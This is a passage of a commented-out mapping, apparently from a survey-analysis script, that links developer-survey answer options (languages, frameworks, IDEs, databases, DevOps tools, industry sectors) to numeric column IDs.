# "js_unittesting.Other": 1260
# },
# "js_moduleloader": {
# "js_moduleloader.None": 1261,
# "js_moduleloader.Browserify": 1262,
# "js_moduleloader.Webpack": 1263,
# "js_moduleloader.RequireJS": 1264,
# "js_moduleloader.SystemJS": 1265,
# "js_moduleloader.Rollup": 1266,
# "js_moduleloader.Parcel": 1267,
# "js_moduleloader.Other": 1268
# },
# "ruby_version": {
# "ruby_version.Ruby 2_6": 1053,
# "ruby_version.Ruby 2_5": 1054,
# "ruby_version.Ruby 2_4": 1055,
# "ruby_version.Ruby 2_3": 1056,
# "ruby_version.Ruby 2_2": 1057,
# "ruby_version.Ruby 2_1": 1058,
# "ruby_version.Ruby 2_0": 1059,
# "ruby_version.Ruby 1_9": 1060,
# "ruby_version.Ruby 1_8": 1061,
# "ruby_version.Other": 1062,
# "ruby_version_management.None": 1063,
# "ruby_version_management.RVM": 1064,
# "ruby_version_management.Rbenv": 1065,
# "ruby_version_management.Asdf": 1066,
# "ruby_version_management.Chruby": 1067,
# "ruby_version_management.Docker": 1068,
# "ruby_version_management.Other": 1069
# },
# "ruby_gemmanagement": {
# "ruby_gemmanagement.None": 1070,
# "ruby_gemmanagement.Bundler": 1071,
# "ruby_gemmanagement.RVM gemsets": 1072,
# "ruby_gemmanagement.Rbenv gemsets": 1073,
# "ruby_gemmanagement.Other": 1074
# },
# "ruby_gems_count": {
# "ruby_gems_count": 1075
# },
# "ruby_frameworks": {
# "ruby_frameworks.None": 1076,
# "ruby_frameworks.Ruby on Rails": 1077,
# "ruby_frameworks.Rack": 1078,
# "ruby_frameworks.Sinatra": 1079,
# "ruby_frameworks.Padrino": 1080,
# "ruby_frameworks.Hanami": 1081,
# "ruby_frameworks.Hyperstack": 1082,
# "ruby_frameworks.Opal": 1083,
# "ruby_frameworks.Other": 1084
# },
# "ruby_rails_version": {
# "ruby_rails_version": 1085,
# "ruby_rails_version_migrate": 1086
# },
# "ruby_servers": {
# "ruby_servers.None": 1087,
# "ruby_servers.Unicorn": 1088,
# "ruby_servers.Puma": 1089,
# "ruby_servers.Passenger": 1090,
# "ruby_servers.Thin": 1091,
# "ruby_servers.Other": 1092
# },
# "ruby_ide": {
# "ruby_ide": 1093
# },
# "ruby_unittesting": {
# "ruby_unittesting.None": 1094,
# "ruby_unittesting.Shoulda": 1095,
# "ruby_unittesting.RSpec": 1096,
# "ruby_unittesting.Cucumber": 1097,
# "ruby_unittesting.MiniTest": 1098,
# "ruby_unittesting.TestUnit": 1099,
# "ruby_unittesting.Other": 1100
# },
# "swiftoc_unittesting": {
# "swiftoc_unittesting.None": 1108,
# "swiftoc_unittesting.XCTest": 1109,
# "swiftoc_unittesting.Quick + Nimble": 1110,
# "swiftoc_unittesting.Kiwi": 1111,
# "swiftoc_unittesting.Specta": 1112,
# "swiftoc_unittesting.Other": 1113
# },
# "swiftoc_ui_tests": {
# "swiftoc_ui_tests": 1122
# },
# "swiftoc_dependecymanager": {
# "swiftoc_dependecymanager.None": 1129,
# "swiftoc_dependecymanager.CocoaPods": 1130,
# "swiftoc_dependecymanager.Carthage": 1131,
# "swiftoc_dependecymanager.Swift Package Manager": 1132,
# "swiftoc_dependecymanager.Other": 1133
# },
# "swiftoc_db_engine": {
# "swiftoc_db_engine.None": 1134,
# "swiftoc_db_engine.SQLite with my own wrapper": 1135,
# "swiftoc_db_engine.CoreData": 1136,
# "swiftoc_db_engine.Realm": 1137,
# "swiftoc_db_engine.Firebase": 1138,
# "swiftoc_db_engine.YAPDataBase": 1139,
# "swiftoc_db_engine.Other": 1140
# },
# "swiftoc_build": {
# "swiftoc_build.I build my project from the IDE": 1143,
# "swiftoc_build.I use Fastlane": 1144,
# "swiftoc_build.I build on CI": 1145,
# "swiftoc_build.Other": 1146
# },
# "swiftoc_linux": {
# "swiftoc_linux.Yes": 1147,
# "swiftoc_linux.No, but I plan to in the next 12 months": 1148,
# "swiftoc_linux.No, and I don\u2019t plan to in the next 12 months": 1149
# },
# "sql_mssql": {
# "sql_mssql.2017": 1364,
# "sql_mssql.2016": 1365,
# "sql_mssql.2014": 1366,
# "sql_mssql.2012": 1367,
# "sql_mssql.2008 R2": 1368,
# "sql_mssql.2008": 1369,
# "sql_mssql.2005": 1370,
# "sql_mssql.2000": 1371,
# "sql_mssql.I'm not sure": 1372
# },
# "sql_mysql": {
# "sql_mysql.8_0": 1380,
# "sql_mysql.5_7": 1381,
# "sql_mysql.5_6": 1382,
# "sql_mysql.5_5": 1383,
# "sql_mysql.5_4": 1384,
# "sql_mysql.I'm not sure": 1385,
# "sql_mysql.Other": 1386
# },
# "sql_postgresql": {
# "sql_postgresql.11": 1387,
# "sql_postgresql.10": 1388,
# "sql_postgresql.9_6": 1389,
# "sql_postgresql.9_5": 1390,
# "sql_postgresql.9_4": 1391,
# "sql_postgresql.9_3": 1392,
# "sql_postgresql.9_2": 1393,
# "sql_postgresql.9_1": 1394,
# "sql_postgresql.9_0": 1395,
# "sql_postgresql.I'm not sure": 1396,
# "sql_postgresql.Other": 1397
# },
# "sql_db2": {
# "sql_db2.11_x": 1398,
# "sql_db2.10_x": 1399,
# "sql_db2.9_x": 1400,
# "sql_db2.8_x": 1401,
# "sql_db2.7_x": 1402,
# "sql_db2.Other": 1403
# },
# "sql_sqlite": {
# "sql_sqlite": 1404
# },
# "sql_tool": {
# "sql_tool.None": 1405,
# "sql_tool.MySQL Workbench": 1406,
# "sql_tool.pgAdmin": 1407,
# "sql_tool.Oracle SQL Developer": 1408,
# "sql_tool.SQL Server Management Studio": 1409,
# "sql_tool.DataGrip": 1410,
# "sql_tool.phpMyAdmin": 1411,
# "sql_tool.Navicat": 1412,
# "sql_tool.Toad": 1413,
# "sql_tool.EMS SQL Manager": 1414,
# "sql_tool.dbForge Studio": 1415,
# "sql_tool.HeidiSQL": 1416,
# "sql_tool.DbVisualizer": 1417,
# "sql_tool.DBeaver": 1418,
# "sql_tool.Sequel Pro": 1419,
# "sql_tool.SQuirreL SQL": 1420,
# "sql_tool.Command Line": 1421,
# "sql_tool.JetBrains IDE(s) (IntelliJ IDEA, PhpStorm, etc_) with the Database plugin": 1422,
# "sql_tool.Robo 3T": 1423,
# "sql_tool.PL / SQL Developer": 1424,
# "sql_tool.Other": 1425
# },
# "use_static_analysis": {
# "use_static_analysis": 1568
# },
# "regularly_tools": {
# "regularly_tools.Source code collaboration tool (e_g_ GitHub, GitLab, Bitbucket)": 342,
# "regularly_tools.Issue tracker (e_g_ Jira, YouTrack)": 343,
# "regularly_tools.Code review tool (e_g_ Crucible, Upsource)": 344,
# "regularly_tools.Continuous Integration (CI) or Continuous Delivery (CD) tool (e_g_ Jenkins, TeamCity)": 345,
# "regularly_tools.Static analysis tool (e_g_ CodeClimate)": 346,
# "regularly_tools.Standalone IDE (e_g_ Eclipse, IntelliJ IDEA)": 347,
# "regularly_tools.Lightweight Desktop Editor (e_g_ Sublime Text, Atom, VS Code, Vim)": 348,
# "regularly_tools.In-cloud Editor or IDE": 349,
# "regularly_tools.None": 350
# },
# "visit_meetups": {
# "visit_meetups.Yes": 1611,
# "visit_meetups.No, but I am planning to": 1612,
# "visit_meetups.No, since there are no meetups in my area": 1613,
# "visit_meetups.No, I am unable to do so for certain reasons": 1614,
# "visit_meetups.No, and I do not want to": 1615,
# "visit_meetups.Other": 1616
# },
# "it_experience": {
# "it_experience.None": 1722,
# "it_experience.Less than 1 year": 1723,
# "it_experience.1 - 2 years": 1724,
# "it_experience.3 - 5 years": 1725,
# "it_experience.6 - 10 years": 1726,
# "it_experience.11+ years": 1727
# },
# "ruby_rails_version_migrate": {
# "ruby_rails_version_migrate": 1086
# },
# "scala_java_version": {
# "scala_java_version.Java 11": 1163,
# "scala_java_version.Java 10": 1164,
# "scala_java_version.Java 9": 1165,
# "scala_java_version.Java 8": 1166,
# "scala_java_version.Java 7": 1167,
# "scala_java_version.Other": 1168
# },
# "scala_frameworks_web": {
# "scala_frameworks_web.None": 1178,
# "scala_frameworks_web.Akka-http": 1179,
# "scala_frameworks_web.Netty": 1180,
# "scala_frameworks_web.Spark Java": 1181,
# "scala_frameworks_web.Play": 1182,
# "scala_frameworks_web.Spray": 1183,
# "scala_frameworks_web.Scalatra": 1184,
# "scala_frameworks_web.Finatra": 1185,
# "scala_frameworks_web.Spring": 1186,
# "scala_frameworks_web.sttp": 1187,
# "scala_frameworks_web.Http4s": 1188,
# "scala_frameworks_web.Other": 1189
# },
# "scala_ide": {
# "scala_ide.IntelliJ IDEA": 1204,
# "scala_ide.Other": 1205
# },
# "scala_buildsystem": {
# "scala_buildsystem.Maven": 1206,
# "scala_buildsystem.Gradle": 1207,
# "scala_buildsystem.sbt": 1208,
# "scala_buildsystem.Other": 1209
# },
# "scala_macros": {
# "scala_macros.Yes, including whitebox macros": 1226,
# "scala_macros.Only blackbox macros": 1227,
# "scala_macros.Only in libraries": 1228,
# "scala_macros.No": 1229,
# "scala_macros.I don\u2019t know anything about macros in Scala": 1230
# },
# "dev_for_desk_os": {
# "dev_for_desk_os.Windows": 49,
# "dev_for_desk_os.Unix / Linux": 50,
# "dev_for_desk_os.macOS": 51,
# "dev_for_desk_os.Other": 52
# },
# "php_frameworks": {
# "php_frameworks.None": 888,
# "php_frameworks.Symfony": 889,
# "php_frameworks.Drupal": 890,
# "php_frameworks.WordPress": 891,
# "php_frameworks.Zend": 892,
# "php_frameworks.Magento": 893,
# "php_frameworks.Laravel": 894,
# "php_frameworks.Joomla!": 895,
# "php_frameworks.Yii": 896,
# "php_frameworks.CakePHP": 897,
# "php_frameworks.CodeIgniter": 898,
# "php_frameworks.Slim": 899,
# "php_frameworks.Other": 900
# },
# "devops_conf_management": {
# "devops_conf_management.None": 1485,
# "devops_conf_management.Puppet": 1486,
# "devops_conf_management.Chef": 1487,
# "devops_conf_management.Ansible": 1488,
# "devops_conf_management.Salt": 1489,
# "devops_conf_management.Custom solution": 1490,
# "devops_conf_management.Other": 1491
# },
# "ruby_version_management": {
# "ruby_version_management.None": 1063,
# "ruby_version_management.RVM": 1064,
# "ruby_version_management.Rbenv": 1065,
# "ruby_version_management.Asdf": 1066,
# "ruby_version_management.Chruby": 1067,
# "ruby_version_management.Docker": 1068,
# "ruby_version_management.Other": 1069
# },
# "agile_framework": {
# "agile_framework.None": 1714,
# "agile_framework.Scrum": 1715,
# "agile_framework.Kanban": 1716,
# "agile_framework.XP": 1717,
# "agile_framework.Combined": 1718,
# "agile_framework.Other": 1719
# },
# "hours_code_hobby": {
# "hours_code_hobby.I don\u2019t have a side project": 1570,
# "hours_code_hobby.Less than 1 hour a week": 1571,
# "hours_code_hobby.1-2 hours a week": 1572,
# "hours_code_hobby.3-8 hours a week": 1573,
# "hours_code_hobby.9-16 hours a week": 1574,
# "hours_code_hobby.17-32 hours a week": 1575,
# "hours_code_hobby.32 hours a week or more": 1576
# },
# "code_weekends": {
# "code_weekends.Yes": 1585,
# "code_weekends.No": 1586
# },
# "app_type_hobby": {
# "app_type_hobby.I don't develop anything for free / only as a hobby": 36,
# "app_type_hobby.Web Back-end": 37,
# "app_type_hobby.Web Front-end": 38,
# "app_type_hobby.Mobile applications": 39,
# "app_type_hobby.Desktop": 40,
# "app_type_hobby.Data analysis": 41,
# "app_type_hobby.BI": 42,
# "app_type_hobby.Machine learning": 43,
# "app_type_hobby.Embedded / IoT": 44,
# "app_type_hobby.Games": 45,
# "app_type_hobby.Libraries / Frameworks": 46,
# "app_type_hobby.Other Back-end": 47,
# "app_type_hobby.Other": 48
# },
# "ides": {
# "ides.RStudio": 351,
# "ides.IntelliJ IDEA": 352,
# "ides.Android Studio": 353,
# "ides.Visual Studio": 354,
# "ides.Xcode": 355,
# "ides.PhpStorm": 356,
# "ides.WebStorm": 357,
# "ides.RubyMine": 358,
# "ides.PyCharm": 359,
# "ides.Vim": 360,
# "ides.Sublime Text": 361,
# "ides.Atom": 362,
# "ides.VS Code (Visual Studio Code)": 363,
# "ides.Notepad++": 364,
# "ides.AppCode": 365,
# "ides.CLion": 366,
# "ides.Eclipse": 367,
# "ides.NetBeans": 368,
# "ides.QtCreator": 369,
# "ides.Emacs": 370,
# "ides.JetBrains Rider": 371,
# "ides.Gedit": 372,
# "ides.IPython/Jupyter Notebook": 373,
# "ides.DataGrip": 374,
# "ides.GoLand": 375,
# "ides.Other": 376
# },
# "mobile_os_how": {
# "mobile_os_how.I use native tools (Swift / Objective-C for iOS, Kotlin / Android, etc)": 79,
# "mobile_os_how.I use cross-platform technologies / frameworks (Xamarin, Apache Cordova, Ionic, etc)": 80
# },
# "crossplatform_framework": {
# "crossplatform_framework.Apache Flex": 81,
# "crossplatform_framework.Corona": 82,
# "crossplatform_framework.Ionic": 83,
# "crossplatform_framework.Kivy": 84,
# "crossplatform_framework.Sencha": 85,
# "crossplatform_framework.Dojo": 86,
# "crossplatform_framework.Titanium": 87,
# "crossplatform_framework.Kendo UI": 88,
# "crossplatform_framework.Xamarin": 89,
# "crossplatform_framework.Cordova": 90,
# "crossplatform_framework.Unity": 91,
# "crossplatform_framework.React Native": 92,
# "crossplatform_framework.Flutter": 93,
# "crossplatform_framework.PhoneGap": 94,
# "crossplatform_framework.NativeScript": 95,
# "crossplatform_framework.Other": 96
# },
# "python_for": {
# "python_for.Educational purposes": 730,
# "python_for.Data analysis": 731,
# "python_for.System administration / Writing automation scripts / Infrastructure configuration (DevOps)": 732,
# "python_for.Software testing / writing automated tests": 733,
# "python_for.Software prototyping": 734,
# "python_for.Web development": 735,
# "python_for.Programming of web parsers / scrapers / crawlers": 736,
# "python_for.Machine learning": 737,
# "python_for.Network programming": 738,
# "python_for.Desktop development": 739,
# "python_for.Computer graphics": 740,
# "python_for.Game development": 741,
# "python_for.Mobile development": 742,
# "python_for.Embedded development": 743,
# "python_for.Other": 744
# },
# "csharp_os": {
# "csharp_os.Windows": 835,
# "csharp_os.Unix / Linux": 836,
# "csharp_os.macOS": 837,
# "csharp_os.Other": 838
# },
# "csharp_vsc_plugins": {
# "csharp_vsc_plugins.None": 839,
# "csharp_vsc_plugins.C# for Visual Studio Code (powered by OmniSharp)": 840,
# "csharp_vsc_plugins.NuGet Package Manager": 841,
# "csharp_vsc_plugins.C# Extensions": 842,
# "csharp_vsc_plugins.C# XML Documentation Comments": 843,
# "csharp_vsc_plugins.Code Runner": 844,
# "csharp_vsc_plugins.ESLint": 845,
# "csharp_vsc_plugins.TSLint": 846,
# "csharp_vsc_plugins.ASP_NET Helper": 847,
# "csharp_vsc_plugins.C# snippets": 848,
# "csharp_vsc_plugins.Other": 849
# },
# "csharp_msdn": {
# "csharp_msdn": 868,
# "csharp_msdn_type": 869
# },
# "csharp_tfs": {
# "csharp_tfs.No": 870,
# "csharp_tfs.TFS": 871,
# "csharp_tfs.VSTS": 872
# },
# "scala_version": {
# "scala_version.2_13": 1155,
# "scala_version.2_12": 1156,
# "scala_version.2_11": 1157,
# "scala_version.2_10 or older": 1158,
# "scala_version.Other": 1159
# },
# "scala_compilationtarget": {
# "scala_compilationtarget.JVM": 1160,
# "scala_compilationtarget.scala_js": 1161,
# "scala_compilationtarget.Other": 1162
# },
# "scala_unittesting": {
# "scala_unittesting.None": 1169,
# "scala_unittesting.ScalaTest": 1170,
# "scala_unittesting.ScalaMock": 1171,
# "scala_unittesting.TestNG": 1172,
# "scala_unittesting.JUnit": 1173,
# "scala_unittesting.ScalaCheck": 1174,
# "scala_unittesting.specs2": 1175,
# "scala_unittesting.\u00b5Test": 1176,
# "scala_unittesting.Other": 1177
# },
# "proglang_rank": {
# "proglang_rank.Java": 208,
# "proglang_rank.C": 209,
# "proglang_rank.C++": 210,
# "proglang_rank.Python": 211,
# "proglang_rank.C#": 212,
# "proglang_rank.PHP": 213,
# "proglang_rank.JavaScript": 214,
# "proglang_rank.Ruby": 215,
# "proglang_rank.Kotlin": 216,
# "proglang_rank.Swift": 217,
# "proglang_rank.Objective-C": 218,
# "proglang_rank.Scala": 219,
# "proglang_rank.Go": 220,
# "proglang_rank.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 221,
# "proglang_rank.Rust": 222,
# "proglang_rank.Haskell": 223,
# "proglang_rank.HTML / CSS": 224,
# "proglang_rank.Elixir": 225,
# "proglang_rank.Crystal": 226,
# "proglang_rank.Visual Basic": 227,
# "proglang_rank.R": 228,
# "proglang_rank.TypeScript": 229,
# "proglang_rank.Dart": 230,
# "proglang_rank.CoffeeScript": 231,
# "proglang_rank.Clojure / ClojureScript": 232,
# "proglang_rank.Delphi": 233,
# "proglang_rank.Cobol": 234,
# "proglang_rank.Groovy": 235,
# "proglang_rank.Perl": 236,
# "proglang_rank.Assembly": 237,
# "proglang_rank.Matlab": 238,
# "proglang_rank.Lua": 239,
# "proglang_rank.Shell scripting languages(bash/shell/powershell)": 240,
# "proglang_rank.Julia": 241,
# "proglang_rank.F#": 242,
# "proglang_rank.Other": 243
# },
# "python_other_techs": {
# "python_other_techs.None": 785,
# "python_other_techs.Sphinx": 786,
# "python_other_techs.Buildout": 787,
# "python_other_techs.ORM": 788,
# "python_other_techs.Other": 789
# },
# "kotlin_how_long": {
# "kotlin_how_long": 1033
# },
# "scala_frameworks": {
# "scala_frameworks_web.None": 1178,
# "scala_frameworks_web.Akka-http": 1179,
# "scala_frameworks_web.Netty": 1180,
# "scala_frameworks_web.Spark Java": 1181,
# "scala_frameworks_web.Play": 1182,
# "scala_frameworks_web.Spray": 1183,
# "scala_frameworks_web.Scalatra": 1184,
# "scala_frameworks_web.Finatra": 1185,
# "scala_frameworks_web.Spring": 1186,
# "scala_frameworks_web.sttp": 1187,
# "scala_frameworks_web.Http4s": 1188,
# "scala_frameworks_web.Other": 1189,
# "scala_frameworks.None": 1190,
# "scala_frameworks.Scala_js": 1191,
# "scala_frameworks.Twitter Util": 1192,
# "scala_frameworks.Akka": 1193,
# "scala_frameworks.Spark": 1194,
# "scala_frameworks.Scalaz": 1195,
# "scala_frameworks.Scalacheck": 1196,
# "scala_frameworks.Specs2": 1197,
# "scala_frameworks.Shapeless": 1198,
# "scala_frameworks.Finagle": 1199,
# "scala_frameworks.Cats": 1200,
# "scala_frameworks.Breeze": 1201,
# "scala_frameworks.Slick": 1202,
# "scala_frameworks.Other": 1203
# },
# "scala_sbt": {
# "scala_sbt.1_0": 1210,
# "scala_sbt.0_13 or older": 1211
# },
# "scala_interactive": {
# "scala_interactive.None": 1212,
# "scala_interactive.Scala REPL": 1213,
# "scala_interactive.sbt console": 1214,
# "scala_interactive.Ammonite REPL": 1215,
# "scala_interactive.Scastie": 1216,
# "scala_interactive.IntelliJ IDEA Worksheet": 1217,
# "scala_interactive.Scala IDE Worksheet": 1218,
# "scala_interactive.Apache Zeppelin Notebook": 1219,
# "scala_interactive.Jupyter Notebook": 1220,
# "scala_interactive.Other": 1221
# },
# "scala_compiler_plugins": {
# "scala_compiler_plugins.None": 1222,
# "scala_compiler_plugins.Scalamacros/Scalameta Paradise": 1223,
# "scala_compiler_plugins.Kind Projector": 1224,
# "scala_compiler_plugins.Other": 1225
# },
# "go_multipleversions": {
# "go_multipleversions": 1427
# },
# "go_gopath": {
# "go_gopath": 1428
# },
# "go_multipleprojects": {
# "go_multipleprojects": 1429
# },
# "go_packagemanager": {
# "go_packagemanager.None": 1436,
# "go_packagemanager.dep": 1437,
# "go_packagemanager.godep": 1438,
# "go_packagemanager.glide": 1439,
# "go_packagemanager.govendor": 1440,
# "go_packagemanager.Go Modules": 1441,
# "go_packagemanager.gpm": 1442,
# "go_packagemanager.Other": 1443,
# "go_packagemanager_migrate.No, I don't plan to": 1445,
# "go_packagemanager_migrate.Yes, planning to adopt / migrate to other package manager(s) - Write in": 1446,
# "go_packagemanager_migrate.dep": 1447,
# "go_packagemanager_migrate.godep": 1448,
# "go_packagemanager_migrate.Go Modules": 1449
# },
# "go_packagemanager_migrate": {
# "go_packagemanager_migrate.No, I don't plan to": 1445,
# "go_packagemanager_migrate.Yes, planning to adopt / migrate to other package manager(s) - Write in": 1446,
# "go_packagemanager_migrate.dep": 1447,
# "go_packagemanager_migrate.godep": 1448,
# "go_packagemanager_migrate.Go Modules": 1449
# },
# "go_frameworks": {
# "go_frameworks.None": 1450,
# "go_frameworks.Buffalo": 1451,
# "go_frameworks.Gin": 1452,
# "go_frameworks.Macaron": 1453,
# "go_frameworks.Echo": 1454,
# "go_frameworks.Beego": 1455,
# "go_frameworks.Revel": 1456,
# "go_frameworks.Other": 1457
# },
# "go_router": {
# "go_router.None": 1458,
# "go_router.standard library": 1459,
# "go_router.gorilla / mux": 1460,
# "go_router.go-chi / chi": 1461,
# "go_router.julienschmidt / httproute": 1462,
# "go_router.gocraft / web": 1463,
# "go_router.Other": 1464
# },
# "go_testing": {
# "go_testing.None": 1465,
# "go_testing.built-in testing": 1466,
# "go_testing.gocheck": 1467,
# "go_testing.testify": 1468,
# "go_testing.ginkgo": 1469,
# "go_testing.gomega": 1470,
# "go_testing.goconvey": 1471,
# "go_testing.gomock": 1472,
# "go_testing.go-sqlmock": 1473,
# "go_testing.httpexpect": 1474,
# "go_testing.Other": 1475
# },
# "go_external_deps": {
# "go_external_deps": 1476
# },
# "go_code_size": {
# "go_code_size": 1477
# },
# "primary_proglang": {
# "primary_proglang.Java": 134,
# "primary_proglang.C": 135,
# "primary_proglang.C++": 136,
# "primary_proglang.Python": 137,
# "primary_proglang.C#": 138,
# "primary_proglang.PHP": 139,
# "primary_proglang.JavaScript": 140,
# "primary_proglang.Ruby": 141,
# "primary_proglang.Kotlin": 142,
# "primary_proglang.Swift": 143,
# "primary_proglang.Objective-C": 144,
# "primary_proglang.Scala": 145,
# "primary_proglang.Go": 146,
# "primary_proglang.SQL(PL/SQL, T-SQL and otherprogramming extensions over SQL)": 147,
# "primary_proglang.Rust": 148,
# "primary_proglang.Haskell": 149,
# "primary_proglang.HTML / CSS": 150,
# "primary_proglang.Elixir": 151,
# "primary_proglang.Crystal": 152,
# "primary_proglang.Visual Basic": 153,
# "primary_proglang.R": 154,
# "primary_proglang.TypeScript": 155,
# "primary_proglang.Dart": 156,
# "primary_proglang.CoffeeScript": 157,
# "primary_proglang.Clojure / ClojureScript": 158,
# "primary_proglang.Delphi": 159,
# "primary_proglang.Cobol": 160,
# "primary_proglang.Groovy": 161,
# "primary_proglang.Perl": 162,
# "primary_proglang.Assembly": 163,
# "primary_proglang.Matlab": 164,
# "primary_proglang.Lua": 165,
# "primary_proglang.Shell scripting languages(bash/shell/powershell)": 166,
# "primary_proglang.Julia": 167,
# "primary_proglang.F#": 168,
# "primary_proglang.Other": 169
# },
# "kotlin_languages_before": {
# "kotlin_languages_before.Java": 1041,
# "kotlin_languages_before.JavaScript/TypeScript": 1042,
# "kotlin_languages_before.C/C++": 1043,
# "kotlin_languages_before.C#": 1044,
# "kotlin_languages_before.PHP": 1045,
# "kotlin_languages_before.Ruby": 1046,
# "kotlin_languages_before.Scala": 1047,
# "kotlin_languages_before.Go": 1048,
# "kotlin_languages_before.Groovy": 1049,
# "kotlin_languages_before.Python": 1050,
# "kotlin_languages_before.Swift": 1051,
# "kotlin_languages_before.Other": 1052
# },
# "devops_server_templating": {
# "devops_server_templating.None": 1492,
# "devops_server_templating.Docker": 1493,
# "devops_server_templating.Vagrant": 1494,
# "devops_server_templating.Packer": 1495,
# "devops_server_templating.CoreOS rkt": 1496,
# "devops_server_templating.Other": 1497
# },
# "devops_use_compose": {
# "devops_use_compose": 1508
# },
# "devops_container_orchestration": {
# "devops_container_orchestration.None": 1509,
# "devops_container_orchestration.Amazon ECS / Fargate": 1510,
# "devops_container_orchestration.Amazon EKS": 1511,
# "devops_container_orchestration.Mesos or DC / OS": 1512,
# "devops_container_orchestration.Kubernetes (self-managed or fully managed)": 1513,
# "devops_container_orchestration.Hashicorp Nomad": 1514,
# "devops_container_orchestration.Docker Swarm": 1515,
# "devops_container_orchestration.CoreOS Tectonic": 1516,
# "devops_container_orchestration.Other": 1517
# },
# "devops_deploy_docker_repo": {
# "devops_deploy_docker_repo.I do not deploy": 1521,
# "devops_deploy_docker_repo.I use only the command line": 1522,
# "devops_deploy_docker_repo.I use a configuration management tool (Chef, Puppet, Ansible, etc_)": 1523,
# "devops_deploy_docker_repo.I deploy from CI / CD": 1524,
# "devops_deploy_docker_repo.I deploy with custom / in-house tools": 1525,
# "devops_deploy_docker_repo.Other": 1526
# },
# "devops_keep_artifacts": {
# "devops_keep_artifacts.I don't keep artifacts": 1527,
# "devops_keep_artifacts.Pulp": 1528,
# "devops_keep_artifacts.Amazon S3": 1529,
# "devops_keep_artifacts.Archiva": 1530,
# "devops_keep_artifacts.NuGet": 1531,
# "devops_keep_artifacts.Nexus": 1532,
# "devops_keep_artifacts.JFrog Artifactory": 1533,
# "devops_keep_artifacts.MyGet": 1534,
# "devops_keep_artifacts.npm": 1535,
# "devops_keep_artifacts.Docker Hub (private or public)": 1536,
# "devops_keep_artifacts.Custom tool": 1537,
# "devops_keep_artifacts.Other": 1538
# },
# "accounts": {
# "accounts.None of the above": 1587,
# "accounts.Facebook": 1588,
# "accounts.Twitter": 1589,
# "accounts.LinkedIn": 1590,
# "accounts.QQ": 1591,
# "accounts.Qzone": 1592,
# "accounts.Baidu Tieba": 1593,
# "accounts.Quora": 1594,
# "accounts.Zhihu (\u77e5\u4e4e)": 1595,
# "accounts.XING": 1596,
# "accounts.Instagram": 1597,
# "accounts.VKontakte": 1598,
# "accounts.GitHub": 1599,
# "accounts.StackOverflow": 1600,
# "accounts.Reddit": 1601,
# "accounts.Other": 1602
# },
# "learn_pl": {
# "learn_pl.I am not learning any programming languages": 1617,
# "learn_pl.Java": 1618,
# "learn_pl.\u0421": 1619,
# "learn_pl.C++": 1620,
# "learn_pl.Python": 1621,
# "learn_pl.C#": 1622,
# "learn_pl.PHP": 1623,
# "learn_pl.JavaScript": 1624,
# "learn_pl.Ruby": 1625,
# "learn_pl.Kotlin": 1626,
# "learn_pl.Swift": 1627,
# "learn_pl.Scala": 1628,
# "learn_pl.Go": 1629,
# "learn_pl.R": 1630,
# "learn_pl.TypeScript": 1631,
# "learn_pl.Haskell": 1632,
# "learn_pl.Elixir": 1633,
# "learn_pl.Clojure": 1634,
# "learn_pl.Rust": 1635,
# "learn_pl.Other": 1636
# },
# "learn_what": {
# "learn_what.I did not learn any new tools / technologies / programming languages in the last 12 months": 1637,
# "learn_what.Offline educational organizations": 1638,
# "learn_what.Books": 1639,
# "learn_what.Personal teacher/consultant": 1640,
# "learn_what.Online coding schools": 1641,
# "learn_what.MOOCs (Coursera, edX, Udacity, etc_)": 1642,
# "learn_what.Blogs/forums": 1643,
# "learn_what.Documentation & APIs": 1644,
# "learn_what.Other": 1645
# },
# "ide_theme": {
# "ide_theme": 525
# },
# "salary": {
# "salary": 1728
# },
# "it_core": {
# "it_core": 1657
# },
# "sectors_it": {
# "sectors_it.Telecom": 1658,
# "sectors_it.Game development (including mobile games)": 1659,
# "sectors_it.Mobile development": 1660,
# "sectors_it.IoT / embedded": 1661,
# "sectors_it.IT services": 1662,
# "sectors_it.Cloud computing / platform": 1663,
# "sectors_it.Big Data / Data analysis": 1664,
# "sectors_it.Hardware": 1665,
# "sectors_it.Data center services": 1666,
# "sectors_it.Software development tools": 1667,
# "sectors_it.Internet / Search engines": 1668,
# "sectors_it.Semiconductors": 1669,
# "sectors_it.E-learning": 1670,
# "sectors_it.FinTech": 1671,
# "sectors_it.Healthcare IT": 1672,
# "sectors_it.Cybersecurity": 1673,
# "sectors_it.BPO services": 1674,
# "sectors_it.Other Software (all other types of software)": 1675,
# "sectors_it.Other": 1676
# },
# "sectors_nonit": {
# "sectors_nonit.Government and defense": 1677,
# "sectors_nonit.Administration / Management / Business Development": 1678,
# "sectors_nonit.Banking / Real Estate / Mortgage Financing / Accounting / Finance / Insurance": 1679,
# "sectors_nonit.Business / Strategic Management": 1680,
# "sectors_nonit.Construction / Architecture": 1681,
# "sectors_nonit.Customer Support": 1682,
# "sectors_nonit.Design": 1683,
# "sectors_nonit.Education / Training": 1684,
# "sectors_nonit.Human Resources": 1685,
# "sectors_nonit.Law": 1686,
# "sectors_nonit.Logistics/ Transportation": 1687,
# "sectors_nonit.Machinery": 1688,
# "sectors_nonit.Aerospace": 1689,
# "sectors_nonit.Automotive and boating": 1690,
# "sectors_nonit.Manufacturing": 1691,
# "sectors_nonit.Marketing": 1692,
# "sectors_nonit.Medicine / Health": 1693,
# "sectors_nonit.Non-profit": 1694,
# "sectors_nonit.Entertainment / Mass media and information / Publishing": 1695,
# "sectors_nonit.Restaurants / Hospitality / Tourism": 1696,
# "sectors_nonit.Sales / Distribution / Retail": 1697,
# "sectors_nonit.Food / Agriculture": 1698,
# "sectors_nonit.Science": 1699,
# "sectors_nonit.Security": 1700,
# "sectors_nonit.Service / Maintenance": 1701,
# "sectors_nonit.Energy": 1702,
# "sectors_nonit.Other": 1703
# },
# "pair_programming": {
# "pair_programming": 1720
# },
# "devops_infr_provisioning": {
# "devops_infr_provisioning.None": 1498,
# "devops_infr_provisioning.Terraform": 1499,
# "devops_infr_provisioning.CloudFormation": 1500,
# "devops_infr_provisioning.TOSCA/Cloudify": 1501,
# "devops_infr_provisioning.OpenStack Heat": 1502,
# "devops_infr_provisioning.Other": 1503
# },
# "devops_involved": {
# "devops_involved": 1484
# },
# "devops_deploy_cloud": {
# "devops_deploy_cloud.Run scripts on your local workstation / VM": 1543,
# "devops_deploy_cloud.Use Continuous Integration / Continuous Delivery": 1544,
# "devops_deploy_cloud.Use your cloud provider's web interface": 1545,
# "devops_deploy_cloud.Other": 1546
# },
# "kind_of_dev": {
# "kind_of_dev.Product development": 1704,
# "kind_of_dev.Outsourcing": 1705,
# "kind_of_dev.Custom-tailored software / websites / applications": 1706,
